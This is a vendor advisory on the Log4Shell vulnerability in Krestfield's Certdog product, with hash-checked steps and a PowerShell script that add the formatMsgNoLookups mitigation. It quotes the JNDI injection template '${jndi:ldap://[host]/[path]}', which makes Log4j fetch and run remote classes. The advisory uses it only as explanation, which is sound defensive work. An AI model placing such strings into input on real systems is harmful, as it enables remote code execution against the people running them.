
Certdog: CVE-2021-44228

Apache Log4j2 Vulnerability (Log4Shell)

A vulnerability exists in Log4j2 that leverages JNDI: it can allow an attacker to supply a string that Log4j2 interprets as a variable lookup.

JNDI does not enforce any security controls on LDAP requests. Therefore, if a string such as the following could be logged:

${jndi:ldap://[host]/[path]}

Log4j2 would interpret it as a variable lookup, and this would result in the classes available at the [host]/[path] location being downloaded and executed.


Am I Vulnerable?

Certdog uses the vulnerable library for local logging. It does not override the web server's logging, so it is not vulnerable to User-Agent attacks. However, a user who has access to the system could insert a string such as the one above.

Certdog runs under a recent version of Java by default, which is also resistant to the attack. Nevertheless, if you have any instances of Certdog that are internet facing, you should take action now by following the "What should we do?" section below.

For internal-only instances it is recommended that these steps are also followed. Although the risk is much lower, the steps are simple and will further protect your instances.


What should we do?

Download the updated start-tomcat.ps1 script from here

The SHA-1 hash of this file is:

b5bff4537e4667ff596ec4cb092add2124dff691

This script includes one extra setting:

-Dlog4j2.formatMsgNoLookups=True

This setting prevents the lookups from being performed.

From your Certdog installation, back up the existing start-tomcat.ps1 script, e.g. from the following location (or wherever Certdog has been installed):

c:\certdog\bin\start-tomcat.ps1

Then replace it with the one downloaded from the link above.


Download the updated log4j2.xml file from here

The SHA-1 hash of this file is:

a7b7b1822e178a53fe6f0a8e940a22b443d0cdd0

From your Certdog installation, back up the existing log4j2.xml file, e.g. from the following location (or wherever Certdog has been installed):

c:\certdog\config\log4j2.xml

Then replace it with the one downloaded from the link above.


Restart the Krestfield CertDog Service
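The steps above, carried out in one PowerShell script, as an added example that is not Krestfield's own code. It checks each downloaded file's SHA-1 against the values given on this page before installing anything, backs up the existing files, confirms the new start script carries the formatMsgNoLookups setting, and restarts the service. It assumes the default install root C:\certdog, that the downloads are in the current user's Downloads folder, and that the Windows service display name is "Krestfield CertDog Service".

```powershell
# Added example (not Krestfield's script): verify, back up, install and restart.
# Assumptions: install root C:\certdog, downloads in $env:USERPROFILE\Downloads,
# service display name "Krestfield CertDog Service".
$InstallRoot = 'C:\certdog'
$Downloads   = "$env:USERPROFILE\Downloads"
$ServiceName = 'Krestfield CertDog Service'   # assumption: display name as named in the advisory

# Expected SHA-1 hashes published in the advisory, with each file's destination
$Expected = @{
    'start-tomcat.ps1' = @{ Sha1 = 'b5bff4537e4667ff596ec4cb092add2124dff691'; Dest = "$InstallRoot\bin\start-tomcat.ps1" }
    'log4j2.xml'       = @{ Sha1 = 'a7b7b1822e178a53fe6f0a8e940a22b443d0cdd0'; Dest = "$InstallRoot\config\log4j2.xml" }
}

$Stamp = Get-Date -Format 'yyyyMMdd-HHmmss'

foreach ($Name in $Expected.Keys) {
    $Src  = Join-Path $Downloads $Name
    $Dest = $Expected[$Name].Dest

    # 1. Refuse to install a file whose hash does not match the published value
    $Actual = (Get-FileHash -Path $Src -Algorithm SHA1).Hash.ToLower()
    if ($Actual -ne $Expected[$Name].Sha1) {
        throw "SHA-1 mismatch for $Name (got $Actual). Not installing."
    }

    # 2. Back up the existing file beside itself before replacing it
    if (Test-Path $Dest) {
        Copy-Item -Path $Dest -Destination "$Dest.$Stamp.bak" -Force
    }
    Copy-Item -Path $Src -Destination $Dest -Force
    Write-Host "Installed $Name -> $Dest (backup: $Dest.$Stamp.bak)"
}

# 3. Confirm the installed start script actually carries the mitigation setting
$Script = Get-Content "$InstallRoot\bin\start-tomcat.ps1" -Raw
if ($Script -notmatch 'log4j2\.formatMsgNoLookups=True') {
    throw 'start-tomcat.ps1 does not contain -Dlog4j2.formatMsgNoLookups=True'
}

# 4. Restart the service so Tomcat starts with the new JVM flag and log4j2.xml
Restart-Service -DisplayName $ServiceName -Force
Get-Service -DisplayName $ServiceName | Select-Object Status, Name, DisplayName
```

Run it from an elevated PowerShell session, since replacing files under C:\certdog and restarting the service both require administrator rights.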


What version of Log4j2 does Certdog use?

Version 1.5.0 and earlier use Log4J version 2.14.1


More Information

Contact Krestfield Support for more information